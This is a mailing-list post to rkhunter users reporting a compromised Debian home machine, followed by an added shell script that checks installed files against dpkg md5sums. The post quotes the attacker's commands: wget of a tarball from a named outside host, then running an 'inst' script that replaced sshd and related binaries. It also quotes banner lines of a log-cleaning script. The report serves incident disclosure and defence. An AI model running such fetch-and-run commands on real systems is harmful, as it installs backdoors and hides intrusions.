Hi guys,

By accident I discovered that I have recently been hacked on my home Linux machine.

I could track them through bash_history!! rkhunter only gave me a warning:

OpenSSH 3.4p1 [ Old or patched version ]

I use Debian and my current sshd is built for RedHat... I have some binaries in /etc/rpm.

I'll reinstall from scratch, I just wanna give you feedback so you can improve rkhunter...

Here are the files wget-ed on my PC:

atikehack.wc.hu/.ssh.tgz
members.lycos.co.uk/treeball/hash

This hash file is a tar.gz. The attacker ran:

=============
wget members.lycos.co.uk/treeball/hash
tar xzvf hash
rm -rf hash
cd back
chmod +x *
./inst
/etc/init.d/sshd restart
/etc/init.d/sshd restart
service sshd restart
sshd restart
w
php -v
===============

I also found a file named 'hide' - a lame script that deletes stuff from the logs. You will see that this inst script overwrites ssh, sshd, sftp and scp.

Sample from this file:

echo " Linux Hider v2.0 by Atike"
echo " enhanced by me! "
echo "[+] [Shkupi Logcleaner] Removing $1 from the logs........ ."
echo ""
....

Hope it helps,

_______________________________________________
Rkhunter-users mailing list
https://lists.sourceforge.net/lists/listinfo/rkhunter-users
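
Added example, not part of the original post and not rkhunter code: since the post reports that ssh, sshd, sftp and scp were overwritten with foreign builds, this sketch checks files against a dpkg-style md5sums manifest and reports any that are modified or missing. The function names and the demo tree are constructed; on a Debian system the manifest would be a file such as /var/lib/dpkg/info/openssh-server.md5sums (the package name is an assumption and varies by release).

```shell
#!/bin/sh
# Added example (not from the original post): check installed files against a
# dpkg-style md5sums manifest, one "<md5>  <path relative to />" per line, the
# format of /var/lib/dpkg/info/<package>.md5sums on Debian.
# Assumption: md5sum and the manifest come from trusted media, since both can
# be replaced on a compromised host.

# verify_manifest ROOT MANIFEST
# Prints one line per listed file that is missing or whose hash differs.
# Returns 0 if everything matches, 1 otherwise.
verify_manifest() {
    root=$1
    manifest=$2
    bad=0
    while read -r want path; do
        [ -n "$path" ] || continue            # skip blank or malformed lines
        if [ ! -f "$root/$path" ]; then
            echo "MISSING  /$path"
            bad=1
            continue
        fi
        got=$(md5sum < "$root/$path" | cut -d' ' -f1)
        if [ "$got" != "$want" ]; then
            echo "MODIFIED /$path"
            bad=1
        fi
    done < "$manifest"
    return "$bad"
}

# Constructed demo: a throwaway tree in which sshd is overwritten after the
# manifest was taken and sftp is absent.
demo() {
    tmp=$(mktemp -d) || return 2
    mkdir -p "$tmp/usr/sbin" "$tmp/usr/bin"
    echo "packaged sshd" > "$tmp/usr/sbin/sshd"
    echo "packaged scp"  > "$tmp/usr/bin/scp"
    echo "packaged sftp" > "$tmp/usr/bin/sftp"
    (cd "$tmp" && md5sum usr/sbin/sshd usr/bin/scp usr/bin/sftp > manifest)
    echo "foreign build" > "$tmp/usr/sbin/sshd"
    rm -f "$tmp/usr/bin/sftp"
    rc=0
    verify_manifest "$tmp" "$tmp/manifest" || rc=$?
    rm -rf "$tmp"
    return "$rc"
}

demo || echo "demo: files differ from the manifest"
```

For a real check, mount the suspect disk read-only from rescue media and pass the mount point as ROOT, so that neither the running kernel nor the replaced binaries are trusted.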
